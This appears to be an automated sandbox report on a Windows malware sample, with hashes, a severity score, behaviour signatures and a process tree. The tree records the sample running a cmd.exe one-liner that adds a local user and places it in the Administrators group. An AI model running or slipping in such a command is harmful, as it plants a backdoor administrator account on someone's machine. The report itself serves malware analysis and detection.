Analysis
-
max time kernel
139s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
08-06-2022 04:21
Static task
static1
Behavioral task
behavioral1
Sample
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Resource
win7-20220414-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Resource
win10v2004-20220414-en
windows10-2004_x64
0 signatures
0 seconds
General
-
Target
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
-
Size
72KB
-
MD5
1f299506e50a82c1111969d4bf76e7ea
-
SHA1
9758832ef27dc5b099417f505da7060dd9f7695e
-
SHA256
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8
-
SHA512
a960f7751d479101ce4d64ac0bbdde1700c7cbeacdd9a6c6f15faaef959a582934cc6053ef2d4fab2c408581a3a477dab02c38d191682b9ca9f894058dd49673
Score
9/10
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.execmd.exenet.exenet.exedescription pid process target process PID 3804 wrote to memory of 1404 3804 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 3804 wrote to memory of 1404 3804 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 3804 wrote to memory of 1404 3804 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe cmd.exe PID 1404 wrote to memory of 796 1404 cmd.exe net.exe PID 1404 wrote to memory of 796 1404 cmd.exe net.exe PID 1404 wrote to memory of 796 1404 cmd.exe net.exe PID 796 wrote to memory of 2824 796 net.exe net1.exe PID 796 wrote to memory of 2824 796 net.exe net1.exe PID 796 wrote to memory of 2824 796 net.exe net1.exe PID 1404 wrote to memory of 1044 1404 cmd.exe net.exe PID 1404 wrote to memory of 1044 1404 cmd.exe net.exe PID 1404 wrote to memory of 1044 1404 cmd.exe net.exe PID 1044 wrote to memory of 2104 1044 net.exe net1.exe PID 1044 wrote to memory of 2104 1044 net.exe net1.exe PID 1044 wrote to memory of 2104 1044 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user lol j /ADD && net localgroup Administrators lol /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user lol j /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user lol j /ADD4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators lol /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators lol /ADD4⤵